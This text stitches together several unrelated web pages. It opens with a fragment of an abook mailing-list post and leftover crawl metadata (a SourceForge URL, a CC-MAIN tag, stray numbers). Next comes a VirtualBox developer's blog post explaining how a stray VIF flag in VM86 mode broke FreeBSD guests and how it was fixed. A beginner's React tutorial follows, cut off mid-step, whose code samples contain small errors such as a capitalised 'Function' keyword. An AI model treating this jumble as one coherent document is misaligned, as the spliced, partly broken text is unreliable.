access the data from abook, then my Perl program could become and "export to LaTeX" filter. If anyone is interested, the program is available on. There is a little shell script to drive it at. There are some header and footer files at and --=20. These channels are respectively stderr, stdin and stdout of the external filter. Now I need to define a convenient protocol... This feature should lower the entry level required to write new filters, as anyone will be able to use his favourite language, presumably one more adapted to text processing than C is. --=20 C=E9dric I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/abook/mailman/abook-devel/?viewmonth=200511
CC-MAIN-2017-26
refinedweb
2,824
66.23
I moved the talk help to Talk. Informational pages, such as those about how to use the wiki, shouldn't be conducted in the Talk namespace (which is where this article is), but in the main namespace. The Talk namespace is for discussing articles, not writing them. Adam Conover 11:42, 19 Feb 2004 (PST) I added an "External links" section with two Wikipedia articles (Wikipedia: Comparison of web browsers and Wikipedia: Comparison of e-mail clients) then redirected the "Product comparison matrix" article to this one, as discussed here. Alice Wyman 15:53, 5 September 2006 (UTC) I notice the image used for the Gecko icon seems to be 404. I found this logo at the MozillaZine site. Should we upload a scaled version of the image to the wiki and use it? -- schapel 17:15, 7 December 2006 (UTC) Re: I guess it would make most sense if the icons were hosted on MZ or mozilla.org. If somebody has some contacts... Uploading images to Imageshack and linking there is OK, I guess, but it would be better if we could upload images to mozillazine.org. Np mentions on his user page under KB wishlist: Image uploading for screenshots Likely just a configuration kerz turned off. Limiting it to a certain size and only images is OK.. I don't know if Np discussed it with kerz but you could ask, I guess, or bring it up on the Knowledge Base changes page. If mozillazine.org has space for all these avatars I don't see why we can't upload some images for the KB articles. Alice Wyman 21:24, 8 December 2006 (UTC) The "Upload file" feature has just been enabled (see Knowledge_Base_changes#Upload_file_enabled) so I uploaded all the images for this article to kb.mozillazine.org and replaced all the old image links with the new ones. Alice Wyman 00:14, 28 December 2006 (UTC)
http://kb.mozillazine.org/Talk:Summary_of_Mozilla_products
crawl-002
refinedweb
320
70.23
The mean absolute percentage error (MAPE) is commonly used to measure the predictive accuracy of models. It is calculated as: MAPE = (1/n) * Σ(|actual – prediction| / |actual|) * 100 where: - Σ – a symbol that means “sum” - n – sample size - actual – the actual data value - prediction – the predicted data value MAPE is commonly used because it’s easy to interpret and easy to explain. For example, a MAPE value of 11.5% means that the average difference between the predicted value and the actual value is 11.5%. The lower the value for MAPE, the better a model is able to predict values. For example, a model with a MAPE of 5% is more accurate than a model with a MAPE of 10%. How to Calculate MAPE in Python There is no built-in Python function to calculate MAPE, but we can create a simple function to do so: import numpy as np def mape(actual, pred): actual, pred = np.array(actual), np.array(pred) return np.mean(np.abs((actual - pred) / actual)) * 100 We can then use this function to calculate the MAPE for two arrays: one that contains the actual data values and one that contains the predicted data values. actual = [12, 13, 14, 15, 15,22, 27] pred = [11, 13, 14, 14, 15, 16, 18] mape(actual, pred) 10.8009 From the results we can see that the mean absolute percentage error for this model is 10.8009%. In other words, the average difference between the predicted value and the actual value is 10.8009%. Cautions on Using MAPE Although MAPE is easy to calculate and interpret, there are two potential drawbacks to using it: 1. Since the formula to calculate absolute percent error is |actual-prediction| / |actual| this means that MAPE.
https://www.statology.org/mape-python/
CC-MAIN-2021-31
refinedweb
293
51.78
vile presents a couple of forms of what are commonly called "macros". This document presents information on those written in the builtin "macro language". (The other form of macro is a "keyboard macro", a simple stored sequence of vile keystrokes, which can be replayed on command.) Macros written in the macro language can be bound to keys, run from files or buffers, given names (in which case they're known as "procedures"), and in the last case, those names may be directly introduced into vile's command set. The language can execute any valid vile command, using one of it's "named" forms. I.e. the command that would be executed would be "down-line", "forward-line", or "next-line", but it would not work to write the macro to use 'j'. vile commands can be linked together in repetitive or conditional ways using various builtin directives (e.g. "if", "else", "while", "break", etc), and intermediate results can be stored in string-valued temporary variables. Other forms of variable can be used to reference parts of vile's current state, e.g. the current line number. Finally, there is a set of functions that can act on variables, to concatenate them, compare them, increment them, change their representation, etc. Each of these language aspects will be described in turn, but first the execution framework must be explained. In the simplest case, valid macro language constructs are placed in a file or buffer and subsequently executed with one of these editor commands: The most common example of this usage is vile's startup file, which is "sourced" during the editor's invocation. Typically, the startup file configures the user's preferences and looks something like this: set ai set ts=4 set flash <etc.> A startup/configuration file might also use macro language directives to conditionally configure the editor. For example, if xvile executes this startup file fragment: ~if &sequal $progname "xvile" set-variable $title $cbufname ~endif then the editor's X window titlebar changes. However, "standard" vile (i.e., non-gui vile) ignores this fragment and thus, a single startup file can be used to configure both the gui and non-gui versions of the editor. vile also provides constructs that encapsulate macro language elements as numbered and named programs. These programs represent the entity that most programmers identify as a "true" macro. And in fact, the remainder of this document will simply assume that the word "macro" refers to one of aforementioned program types. <number> store-macro <language element> ... <language element> ~endm A numbered macro is executed using this command: execute-macro-<number> To bind a keystroke to this macro, use this command: bind-key execute-macro-<number> <keystroke> Here's an actual example: 30 store-macro write-message "this is a test macro" ~endm bind-key execute-macro-30 #h Now, whenever "#h" is pressed, a message is written on the editor's message line. Although this syntax serves a purpose, it's obvious that numbered programs don't lend themselves to easy recall (quick, what does macro 22 do?). But this format was an integral part of vile for many years, simply because named macros could not be bound to keystrokes. This restriction has been removed, rendering this feature essentially obsolete. The only advantage of numbered macros over named macros is that the former do not share the same namespace as vile's commands. This attribute can be advantageous when creating macros recalled solely via key bindings. For completeness sake, it should be mentioned that numbered macros are allocated from a fixed pool (default is 40 macros). This fixed pool can be increased via the following configuration option: --with-exec-macros=N specify count of numbered macros store-procedure <unique-name> ["help-string"] <language element> ... <language element> ~endm where: A stored procedure is executed by simply referencing its name. To bind a keystroke to this macro, use this command: bind-key <unique-name> <keystroke> Here's the stored procedure equivalent of macro number 30 above: store-procedure write-msg-tst "displays test message" write-message "this is a test macro" ~endm bind-key write-msg-tst #h Two mechanisms now exist for executing this macro: :write-msg-tst Named macros may have parameters. Like Bourne shell, the parameters are denoted '$' followed by a number, e.g., $1 for the first parameter. The individual parameters are evaluated when the macro is invoked, and may consist of expressions. They are stored as strings. The macro interpreter uses a template in the definition to define the types of parameters which are accepted. For each parameter, a keyword, optionally followed by the prompt string is required. Keywords (which may be abbreviated) include bool buffer directory enum (see below) file integer majormode mode register string variable Unless overridden, the prompt for each parameter is named after the keyword. Override the prompt by an assignment, e.g., store-procedure Filter f="Input" f="Output" to begin a macro 'Filter' with two parameters, Input and Output, internally referenced by $1 and $2. Here is a simple macro which accepts two parameters and uses them to position the cursor on a given line and zero-based character offset. ; macro for wingrep and similar applications that can pass ; both line- and column-number to external tools. ; usage: "winvile +WinGrep $L $C $F" store-procedure WinGrep i="Line" i="Offset" ~local %col setv %col &sub $2 1 $1 goto-line beginning-of-line ~if &ge %col 1 %col forward-character-to-eol ~endif ~endm The 'enum' parameter type is special; it requires a second keyword which denotes the symbol table which is used for name-completion. The table name (which cannot be abbreviated) follows the 'enum' after a colon (:), e.g., store-procedure Scheme e:fcolor="Foreground" The 'enum' tables correspond to the enumerated modes: *bool backup-style bcolor byteorder-mark ccolor color-scheme cursor-tokens fcolor file-encoding for-buffers mcolor mini-hilite popup-choices qualifiers reader-policy record-attrs (VMS only) record-format (VMS only) recordseparator showformat video-attrs visual-matches vtflash TRUE FALSE ABORT SORTOFTRUE $_ may also contain the special symbol ERROR if the macro could not run, e.g., due to too much recursion, or if the exit status was none of the standard values. In general, macros are stored in the editor's startup file. Prolific macro authors may instead opt to sprinkle their macros across one or more external text files and source those file(s) from the startup file. The remainder of this document describes individual language constructs. The presentation is bottom-up (i.e., reference format), so individual sections may be read in any order. A semi-colon (;) or double-quote (") denotes a comment that extends from the delimiter to end of line. The semi-colon is inherited from MicroEMACS, the double-quote is for vi compatibility. Note 1: The double-quote also delimits string arguments, but the command parser correctly distinguishes the various use cases. Note 2: Inline comments (comment text that follows a command) are permitted except when used in conjunction with commands that take optional arguments. Here follow two examples of unacceptable usage: winopen ; invoke win32 common open dialog write-file ; flush curr buffer to disk In the first case, the winopen command attempts to browse ';' as a directory. In the second case, write-file flushes the current buffer to disk using ';' as the filename. Lines ending with '\' are joined before interpretation. The length of a variable name may not exceed 255 (NLINE-1) bytes of storage. Most other strings are allocated dynamically. Like many simple languages, the macro language operates exclusively on strings. That is to say, variables are always of type "string", and need not be declared in advance. Strings may be surrounded by double quotes. As in C-like languages, a few special characters may be represented using an "escape" notation, using a backslash and another character to represent the "special character:" It is permissible to omit the double quotes surrounding a string if the parser will not confuse it with another element of the macro language, and if it contains no whitespace, but it's probably better practice to use the quotes all the time, to reinforce the idea that all values are strings. You may also use strings surrounded by single quotes. The single quotes override double quotes and backslashes, making it simpler to enter regular expressions. Double a single quote to insert one into a string. As noted above, variables hold strings. These strings may represent words, text, numerical values, logical values, etc, depending on the context in which they are used. There are several distinct classes of variables, distinguished syntactically by the character preceding their name. All temporary variables, and some state variables, may be assigned to, using the "set-variable" command, or "setv" for short: set-variable $search "new pattern to look for" setv %index "1" setv %index2="2" An assignment may use either an equals (=) sign, or whitespace to delimit the left/right sides of the assignment, as shown. Temporary variables are used in macros to hold intermediate values. They are only temporary in that they aren't a "fixed" part of vile — but they _are_ persistent across invocations of one or more macros. (That is, they have global scope.) Temporary variables are prefixed with the % character, and their names may be constructed from any printing character. State variables allow a macro to refer to and change some aspects of vile's behavior. State variables are prefixed with a $ character, and are always referred to in lowercase. Not all state variables are settable — some are read-only, and are so marked in the table below. You can also refer to the value of a mode by prefixing its name with a $ character. However: Here are the state variables: If none of the above options are in effect, $cfgopts will be empty (""). set-variable $search "new pattern to look for" setv %index "1" setv %index2="2" force-empty-linescommand uses this value to decide whether to add or delete blank lines to make all line-gaps the same size. The default (false) allows vile to search forward until it gets a match which may not necessarily include "dot". The default (false) behavior in vile matches from the current editing position onward. The number is the character offset (starting at zero) of the match. It is set to -1 if there is no match. The number is the character length of the match. It is set to -1 if there is no match. $term-encoding. $startup-path. -uor -Uoption, since those buffers may be initialized before the initialization script is processed. You may set and use the values of the editor modes (i.e., universal modes, buffer-only modes or window-only modes) as if they were state variables (e.g., "setv $errorbells=true"). The global values of the editor modes are not visible to the expression evaluator. Realistically, this feature is little used, since vile's set/setl commands, as well as the &global/&local functions, serve the same purpose. Buffer variables (a '<' followed by a buffer name) return the current line of the specified buffer, automatically setting the position to the next line. They are so similar to a query function that there is function which serves this exact purpose, and which should be used in preference. Thus, one might have previously written: set-variable %file @"What file?" Instead, one should now write: set-variable %file &query "What file?" Functions always return strings. Functions can take 0, 1, 2, or 3 arguments. Function names are always preceded by the & character, and can usually be shortened to just three characters, though there is little reason to do so. Tasks that are usually implemented as "operators" in other languages are implemented as functions in vile's macro language. Thus, for example, arithmetic division which is usually written as "6 / 2" is written as "&div 6 2". (I believe this is sometimes called "prefix" notation, as opposed to the normal operator "infix" notation, or the "postfix" notation used on a stack-oriented calculator, i.e. "6 2 /".) Depending on the function, arguments may be expected to represent generic strings, numeric values, or logical (boolean) values. Arithmetic functions — These all return numeric values: String manipulation functions — These two return numeric values: The rest return strings: Boolean/logical functions — These all return TRUE or FALSE: Miscellaneous functions — These all return string values: &env &indirect %foo will return the home directory pathname. bin – look in vile's directory current – look in the current directory home – look in user's $HOME directory libdir – look along $libdir-path path – look along user's $PATH startup – look along $startup-path as well as associated access tests: execable - test if file is exec'able readable - test if file is readable writable - test if file is writable The search order is fixed: current, home, bin, startup, path, libdir. Note that the directory lists may overlap. end – suffix of the filename full – absolute path head – directory root – filename without suffix short – relative path tail – filename The macro language has the capability for controlling flow and repetition through conditional, branching, and looping instructions. Complex text processing or user input tasks can be constructed in this way. The keywords that introduce this control are called "directives". They are always prefixed with the ~ character, and they are always in all lowercase. The "store-procedure" and "store-macro" commands both indicate the start of the body of a macro routine. ~endm indicates the end of that routine. To prevent a failed command from terminating the macro which invokes it, the ~force directive can be used to "hide" a bad return code. For instance, the "up-line" command might fail if executed at the top of a buffer. "~force up-line" will suppress the failure. The $status variable can be used to determine whether the command succeeded or not. You can suppress not only the check for success or failure of a macro as in ~force, but also the screen refresh, making macros run more rapidly. For example 30 store-macro write-message "[Attaching C/C++ attributes...]" ~local $curcol $curline ~hidden goto-beginning-of-file ~hidden attribute-from-filter end-of-file "vile-c-filt" write-message "[Attaching C/C++ attributes...done ]" ~endm bind-key execute-macro-30 ^X-q causes the screen updates from moving the current position to the beginning of the file and then filtering (which moves the position to the end-of-file) to be suppressed. The screen will be updated after completion of the macro, after the current position has been restored from the values saved with the ~local directive. Rather than suppress all screen updates, you may suppress any messages that are written as the command progresses. These control execution of macro commands in the expected manner. The ~if directive is followed by a string which is evaluated for truth or falsehood according to the rules outlines for boolean variables, above. The following fragment demonstrates the use of this family of directives: beginning-of-line ; test for '#' ~if &equ $char 35 set-variable %comment-type "shell comment" ; test for ';' ~elseif &equ $char 59 set-variable %comment-type "vile macro language comment" ~else write-message "Not an expected comment type" ~return ~endif write-message &cat "The current line is a " %comment-type What would a decent programming language be without a "goto"? The ~goto directive is followed by the name of a label. Labels may appear anywhere in the current macro definition, and are themselves preceded with a * character. ~force up-line if ¬ $status ~goto foundtop ... ... *foundtop write-message "At top of buffer" The block of statements bracketed by ~while and ~endwhile are executed repeatedly, until the condition being tested by ~while becomes false. ; how many occurrences of a given pattern in a buffer? set nowrapscan set-variable %lookfor somepattern ; we'll count one too many set-variable %howmany "-1" set-variable %continue yes ~while %continue ~force search-forward %lookfor set-variable %continue $status set-variable %howmany &add %howmany "1" ~endwhile write-message &cat &cat %howmany " appearances of " %lookfor The ~break directive allows early termination of an enclosing while-loop. Extending the above example: ; count the occurrences of a pattern in all buffers set nowrapscan set noautobuffer rewind set-variable %lookfor pgf set-variable %howmany "0" set-variable %buffers "1" set-variable %cont yes ~while true goto-beginning-of-file ~while true ~force search-forward %lookfor ~if ¬ $status ~break ~endif set-variable %howmany &add %howmany "1" ~endwhile ~force next-buffer ~if ¬ $status ~break ~endif set-variable %buffers &add %buffers "1" ~endwhile set-variable %msg %lookfor set-variable %msg &cat " appeared " set-variable %msg &cat %howmany set-variable %msg &cat %msg " times in " set-variable %msg &cat %msg %buffers set-variable %msg &cat %msg " buffers." write-message %msg This causes immediate exit of the current macro, back to the calling macro, or to user control, as appropriate. The ~local directive causes the variables which are listed to be saved at that point (once if the directive is within a loop), and automatically restored at the end of the current macro. If the directive specifies a temporary variable which was not defined before, it will be deleted rather than restored. For example: ~local $curcol $curline will restore the cursor position. The order is important in this example, because vile restores the variables in the reverse order of the ~local declaration. If $curline is set, $curcol will be reset to the first column as a side effect. So we specify that $curcol is restored last. ~local can save/restore the state of mode variables [1], user variables and the state variables shown with show-variables. Note that setting certain variables, such as the cursor position, will have side effects, i.e., modifying the display. If these are distracting, use ~hidden or ~quiet to suppress display updates until the macro completes. [1] Subject to the limitations described above for "Mode variables". Namely, "global values of the editor modes are not visible to the expression evaluator." Tokens following the ~with directive will be prepended to succeeding lines of macro until the next ~endwith directive, or the end of the current macro. This is useful for simplifying majormode directives, which are repetitive. Use ~elsewith as a convenience for fences; otherwise it functions just as ~with does. For example, use define-mode txt ~with define-submode txt suf "\\.txt$" comment-prefix "^\\s*/\\?--" ~endwith rather than define-mode txt define-submode txt suf "\\.txt$" define-submode txt comment-prefix "^\\s*/\\?--" define-submode txt comments "^\\s*/\\?--\\s+/\\?\\s*$" For example, ~trace on activates tracing, ~trace off deactivates it, and ~trace prints a message telling if tracing is active. The "show-commands" command lists _all_ available editor commands. This is, admittedly, a large list and generally grows with successive releases of the editor. Fortunately, most editor commands include short help strings that describe their purpose. To winnow the list to a particular area of interest, use the "apropos" command (e.g., "apropos append"). To determine the command bound to a specific key, use "describe-key". The format of the apropos, describe-key, and show-commands listing is as follows: command-name optional-key-binding(s) optional-command-name-aliases (help-string) Commands fall into three broad categories: simple, motion, operator. "find-tag" ^] or "ta" or "tag" ( look up the given (or under-cursor) name as a "tag" ) From the perspective of writing a macro, it can be seen that find-tag has two aliases, either of which may be substituted for the "find-tag" name within a macro definition. Notice that the help string mentions a "name" argument and sure enough, if you type ":find-tag" within the editor, you'll be prompted for a "Tag name". This gives us enough information to write a contrived macro that finds a fixed tag name: store-procedure tryit tag "filterregion" ~endm Note also that some help strings include a "CNT" keyword, which indicates that the command name may be preceded by an integer count that repeats the command action that many times (default CNT value is 1). For example, here's the "join-lines" listing: "join-lines" J ( join CNT lines together with the current one )And here's a macro that joins 4 lines: store-procedure join4 4 join-lines ~endm Within a macro, the following general syntax invokes a motion: [count] region-spec The optional "count" specifies the number of affected region-specs (default value is 1). An example motion is "back-line", and here is its show-commands listing: "back-line" k #-A or "previous-line" or "up-arrow" or "up-line" (motion: move up CNT lines ) Note that the help string is prefixed with the word "motion", which unambiguously identifies the nature of this command. Given the above information, we can write a contrived macro to move the cursor up three lines: store-procedure upthree 3 back-line ~endm Operators manipulate regions. The "show-operators" command lists the editor's operator commands. By convention, most operator names end with "-til" (short for "until"). Within a macro, the following general syntax invokes an operator: [count] operator-name region-spec [args...] where: "flip-til" ^A-~ or "~" (operator: exchange upper and lowercase on characters in the region) (may follow global command) A salient point to note within the help string is the "operator" keyword, which unambiguously identifies the purpose of this command. Given the above information, we can write a macro to flip the case of the current paragraph. store-procedure flippara up-paragraph ; move to beginning of para flip-til down-paragraph ; flip case of entire para ~endm One might be tempted to bind this macro to a key using this syntax: bind-key flippara g and then attempt to use a numerical argument to control the number of affected paragraphs. I.E., type "3g" to flip three paragraphs. But this actually invokes "flippara" three times in a row, which (due to the sequential up- and down-paragraph motions), flips the case of the _same_ paragraph three times. However, we can workaround that obstacle with the use of an interactive variable: store-procedure flippara setv %dflt 1 setv %quest @&cat &cat "Flip how many para [" %dflt "]? " ~if &sequal %quest "" setv %quest %dflt ~endif up-paragraph %quest flip-til down-paragraph ~endm vile's popup-msgs mode pops up the [Messages] buffer to show text written to the message line. Closing the [Messages] buffer window clears its content until the next message is written. This mode is most useful when debugging macros, since many messages may appear, each overwriting a previous one. Let's use this macro fragment for illustration: ~if &greater $blines 0 ; buffer has at least one line of data, proceed ~else ; this is unexpected! ~endif Suppose the macro is taking the unexpected code path in one of several buffers, but you don't know which. To trace the path, modify the macro like so: ~if &greater $blines 0 ; buffer has at least one line of data, proceed ~else ; this is unexpected! setv %msg &cat "Error: Buffer " &cat $cbufname " empty" write-message %msg ~endif Next, enable popup-msgs (i.e., set popup-msgs) and then start the macro. When the "write-message" command is executed, the [Messages] buffer pops up and displays the string written by the unexpected code path. Disable popup-msgs using this command: :set nopopup-msgs The startup file included below illustrates several of the language constructs described in this document. This example is crafted for the win32 environment, but its syntax and usage are applicable to any host OS supported by vile. set ai aw ts=4 sw=4 flash bind-key next-window ^N bind-key previous-window ^P ~if &sequal $progname "winvile" set-variable $font "r_ansi,8" ~endif ~if &equal 0 &sindex &lower $shell "command.com" set w32pipes ~else set now32pipes ~endif ~if ¬ &equal 0 &sindex $cfgopts "perl" perl "use hgrep" perl "use dirlist" ~endif ~if ¬ &equal 0 &sindex $cfgopts "oleauto" set redirect-keys=&cat &global redirect-keys ",MULTIPLY:A:S" ~endif ; modify ^A-i and ^A-o so that they don't wrap inserted text. store-procedure save-wrap-state setv %wm=$wrapmargin setv %ww=$wrapwords setl nowrapwords wm=0 ~endm store-procedure restore-wrap-state setl wrapmargin=%wm ~if %ww setl wrapwords ~else setl nowrapwords ~endif ~endm store-procedure insert-chars-noai-nowrap save-wrap-state insert-chars-no-autoindent restore-wrap-state ~endm bind-key insert-chars-noai-nowrap ^A-i store-procedure open-line-below-noai-nowrap save-wrap-state open-line-below-no-autoindent restore-wrap-state ~endm bind-key open-line-below-noai-nowrap ^A-o ;Rather than composing documents in a word processor, it's much ;more efficient to use vile. But pasting vile-formatted text into, ;say, MS Word is a pain in the neck because each paragraph needs ;to be reformatted. Example: ; ; vile txt ; ======== ; para 1 line1, ; line 2, ; line 3, ; line 4 ; ; para 2 line 1, ; line 2, ; line 3, ; line 4 ; ;If "vile txt" is copied and pasted into Word, it looks awful because ;the lines of the paragraphs do not flow together (i.e., the new lines ;terminating each vile paragraph serve as a "hard" paragraph break). ; ;'Twould be nice if vile could join each paragraph so that "vile txt" ;above looked like this: ; ; vile txt ; ======== ; para 1 line1, line 2, line 3, line 4 ; ; para 2 line 1, line 2, line 3, line 4 ; ;Then, when this version is pasted into Word, all paragraphs are ;automatically reformatted. Here's a macro that adds this feature: store-procedure join-all-para goto-beginning-of-file write-message "[joining all paragraphs...]" ~while true ~force join-lines-til down-paragraph ~if ¬ $status ~break ~endif goto-bol ~force 2 down-line ;skip to next para ~if ¬ $status ~break ~endif ~endwhile ~endm This document, and the macro language it describes, owes a debt of thanks to Dan Lawrence and his MicroEMACS text editor. Many of the features described herein first appeared in this form in MicroEMACS.
https://www.invisible-island.net/vile/macros.html
CC-MAIN-2022-21
refinedweb
4,333
50.97
I was dreading getting travis to work on both 0.6 and 1.0 as I believed that Pkg.dir would throw an error in 1.0, but mercifully I discovered today that even in 1.0 Pkg.dir still only gives a warning. I was wondering why that is, is there a plan to bring it back? Unfortunately the new pathof alternative is rather unwieldy in travis scripts import Pkg, PackageName; cd(joinpath(dirname(pathof(PackageName)),"..","otherdir"); other_functions() Of course this code doesn’t work on 0.6. Without knowing how to make version dependent travis scripts, I’ve taken to doing VERSION < v"0.7-" || using Pkg; cd(Pkg.dir("PackageName")) since using Pkg throws an error in 0.6. Does anyone have any more elaborate travis or aws scripts or yamls for both 0.6 and 1.0 that they care to share as helpful examples?
https://discourse.julialang.org/t/status-of-pkg-dir-and-writing-travis-and-other-configs/13502
CC-MAIN-2022-21
refinedweb
149
79.77
craigt has asked for the wisdom of the Perl Monks concerning the following question: I'm working on a Windows platform using an Apache server and dHTML - HTML, CSS, JavaScript, Perl/CGI, and a number of APIs. I have a custom parameter file that's read into a CGI module. The parameters in that file allow a user to customize the geography and appearance of the application. The parameters in that file are embedded in the CSS, JavaScript, and Perl code in the CGI module. I define my Perl namespaces at the beginning of the module, with names like $navytext. I then read the custom parameter file into an array. The parameters in the file have the same names as the namespaces I define in the CGI module. I split the comment portion of each parameter line off and eval the parameter value into the CGI module where it is then used downstream in CSS, JavaScript, and Perl. A simplified code example follows. my $navytext; # This variable appears as the line '$navytext = '000066 +' # Navy blue text.' in the custom parameters file below. . . . my $cpsfnx = $thepdir . 'custom.parms'; if (-e $cpsfnx) { my @cpslnsx = in_shared($cpsfnx); my $cpsln = ''; foreach $cpsln (@cpslnsx) { if (index($cpsln,'#') > 1) { ($cpsln,$tmp) = split ('#',$cpsln); } eval($cpsln); } } . . . <HEAD> <STYLE> #tabmenu { color: #$navytext; } [download] Notice in the example that the CSS with the Perl namespace $navytext resides right in the Perl module. This has all worked well for some time. Now I would like to remove the CSS from the Perl module, put it in a CSS file, and link the CSS file into the Perl module. When I do this, the Perl variable no longer resolves correctly to the HTML color and the CSS does not work. I have tried to quote the Perl variable in the CSS file in several ways with no luck. The question is can I link an external CSS file with embedded Perl variables into a CGI module so that the Perl variables resolve correctly? What you want is to use one of the many templating systems. See Template for a selection of those. If you're hell-bent on rolling your own, just to keep the precious Perl variables, my suggestion is to declare them explicitly in a hash and to replace them with a tiny loop: my %template_variables = ( 'navytext' => $navytext, # ... ); my $css = <<'CSS'; #tabmenu { color: #$navytext; } CSS sub fill_template { my( $str, $vars ) = @_; $str =~ s!\$(\w+)!$template{ $1 } || '$' . $1!ge; $str }; print fill_template( $css , \%template_variables ); [download] Thanks for the suggestion Corion. No recent polls found
https://www.perlmonks.org/?node_id=1223576
CC-MAIN-2021-10
refinedweb
424
71.75
Yes,i know ask this question here is a little unseasonable,but i think someone here might give me the answer. I wanna write a simple filesystem interception program baesd on the LSM,just have some function like could not add a file to a directory and so on.Somebody told me use the LSM,but as a fact that i actually can not find useful information on how to write a LSM module. So i consult the selinux code which is in the kernel.Then i write a very simple kernel module below: Ok i actually do not know if the my module can be insmod to the kernel then what will happen,but in fact it could not insmod into because of a make Warning "WARNING: "register_security" [xxxxxxxxxxxxxx.ko] undefined!".Ok i actually do not know if the my module can be insmod to the kernel then what will happen,but in fact it could not insmod into because of a make Warning "WARNING: "register_security" [xxxxxxxxxxxxxx.ko] undefined!".Code: #include <linux/kernel.h> #include <linux/init.h> #include <linux/security.h> struct security_operations ops; int flag; static int my_not_rename(struct inode *old_inode, struct dentry *old_dentry, struct inode *new_inode, struct dentry *new_dentry) { return 0; } static int __init mylsm_init(void) { int flag; ops.inode_rename = my_not_rename; flag = register_security(&ops); if(flag != 0) { //error } return 0; } static void __exit mylsm_exit(void) { } module_init(mylsm_init); module_exit(mylsm_exit); I found a guy have a same problem:Compile and install modules without kernel recompile. It seems that the register_security() is not an exported kernel symbol... Well,the register_security() cant use,now how i can finish my module based on the LSM. I ask some other place but no people give me a answer. As backtrack still could not true running on my computer because of my network adapter don't like she,but i hope somebody here can help me on my problem,thanks a lot and a lot.
http://www.backtrack-linux.org/forums/printthread.php?t=30297&pp=10&page=1
CC-MAIN-2017-09
refinedweb
323
53
Bug investigation (part 1 - tale of sir VIF) By nike on Mar 12, 2009 I'm receiving the following message when certain commands are run in FreeBSD 6.2 and VirtualBox 1.4.0: sigreturn: eflags 0x80247 This error was one of nasty blockers to run FreeBSD reliably as the guest, and as I thought it's a good idea to support it, I looked on that bug. As it was pointed out in the bug, message is triggered by: if (!EFL_SECURE(eflags & ~PSL_RF, regs->tf_eflags & ~PSL_RF)) { printf("sigreturn: eflags = 0x%x\\n", eflags); return (EINVAL);in FreeBSD kernel's sys/i386/i386/machdep.c. This check essentially means, that sometimes, in EFLAGS CPU register some bit FreeBSD considered insecure was toggled. Bit which is of interest is VIF bit, which has rather convoluted story behind itself. When Intel, in early 90s wanted to keep compatibility with legacy 16-bit DOS code, while running protected mode OSes, they introduced so called VM86 mode. This mode was first take of Intel on virtualization, and call it clumsy is kind of compliment. VIF (and VIP) flags are exactly part of this extension. VIF represents virtualized version of IF flag (interrupts enabled flag). If DOS application would be allowed to modify real IF - it could disable interrupts and render whole system unusable. Thus instead, cli instruction in VM86 mode affected only VIF flag. At the same time, pushf and popf instructions which are (almost) only way to access EFLAGS, were modified in such a way, that value of VIF bit was placed to IF bit. And as VIF is 19th bit of EFLAGS, it's not visible in 16-bit version of pushf. So now the bug reasons: sometimes FreeBSD executes BIOS calls in VM86 mode, which may modify VIF flag on the CPU. When taking protected mode interrupts (such as timer used for task scheduling), if it happens in the wrong moment (when VIF flag value was toggled) our dynamic recompiler wasn't clearing VIF flag (as according to Intel/AMD instruction manuals it shouldn't). All following EFLAGS accesses has VIF flag setting masked, thus to OS it looked like VIF bit toggled at random. Fix was not that hard: just mask out VIF and VIP bits in EFLAGS when taking interrupts in VM86, as those bits makes no sense outside of VM86 mode. Next post will cover story of most time consuming bug I ever worked on (about 80 hours of continuous hacking).
https://blogs.oracle.com/nike/entry/bug_inverstigation_part_1_tale
CC-MAIN-2016-26
refinedweb
413
60.04
Get the highlights in your inbox every week. A beginner's guide to developing with React | Opensource.com A beginner's guide to developing with React A step-by-step guide to using React in your web and mobile user interfaces. Subscribe now React is a JavaScript user interface (UI) library that was built and is maintained by Facebook. React helps JavaScript developers think logically and functionally about how they want to build a UI. With React, you can build: - Single-page applications - Applications that are easy to understand - Scalable applications - Cross-platform applications React allows developers to build applications declaratively and offers a unidirectional flow of data. React's advantages The following features explain why React is one of the most popular web frameworks. - It is declarative: React makes it extremely painless to build interactive user interfaces, design basic views for your application based on various states, and update and render new views when the data in your application changes. - It is component-based: React gives you the ability to build encapsulated components that can manage their own state, then puts them together to build complex UIs. The logic of these components is written in JavaScript instead of templates, so you easily pass actual data and keep state out of the document object model (DOM). - You can learn once, write anywhere: React gives you the ability to build for both mobile (React Native) and the web. There's no need to rewrite your existing codebase; you can just integrate React with your existing code. - The virtual DOM: React introduced a wrapper around the regular DOM called the virtual DOM (VDOM). This allows React to render elements and update its state faster than the regular DOM. - Performance: React has great performance benefits due to the VDOM and one-way flow of data. The virtual DOMReact's VDOM is like a virtual copy of the original DOM. It offers one-way data binding, which makes manipulating and updating the VDOM quicker than updating the original DOM. The VDOM can handle multiple operations in milliseconds without affecting the general page performance. This VDOM supports React's declarative API: You basically tell React what state you want the UI to be in, and it ensures that the DOM matches that state. Prerequisites for learning React Learning React requires basic knowledge of JavaScript, HTML, and CSS. To use React's power effectively, it helps to be familiar with ECMAScript 6 (ES6) and functional and object-oriented programming. You also need the following things installed on your computer: Basic React concepts It also helps to have an understanding of React's concepts. Components Components are standalone, reusable pieces of code. They have the same purpose as JavaScript functions but work alone and return HTML via a built-in render function. They are two main types of components: - Class components offer more control in the form of lifecycle hooks, managing and handling state, and API calls. For example:class MyComponent extends React.Component { render() { return <div>This is a class component</div>; } } - Functional components were used for rendering just views without any form of state management or data request until React Hooks was introduced. For example:Function myComponent() { return ( <div>A functional Component</div> ) } Props React props are like function arguments in JavaScript and attributes in HTML. They are read-only. For example: function Welcome(props) { return <h1>Hello, {props.name}</h1>; } State React components have a built-in object called state, which is where you store property values that belong to a particular component. If a component's state changes at any point in time, the component re-renders. For example: class Car extends React.Component { constructor(props) { super(props); this.state = { brand: 'Ford' }; } render() { return ( <div> <h1>My Car</h1> </div> ); } } JSX JSX is a syntax extension to JavaScript. It is similar to a template language but has the full power of JavaScript. JSX is compiled to React.createElement() calls, which return plain JavaScript objects called React elements. For example: return ( <div> <h1>My Car</h1> </div> ); The code between the return method that looks like HTML is JSX. How to use React Ready to get started? I'll go step-by-step through two options for using React in your app: - Adding its content delivery network (CDN) to your HTML file - Starting a blank React app with Create React App Add its CDN to your HTML file You can quickly use React in your HTML page by adding its CDN directly to your HTML file using the following steps: Step 1: In the HTML page you want to add React to, add an empty <div> tag to create a container where you want to render something with React. For example: Step 2: Add three <script> tags to the HTML page just before the closing </body> tag. For example: <!-- ... Some other HTML ... --> <!-- Initiate React. --> <!-- Note: 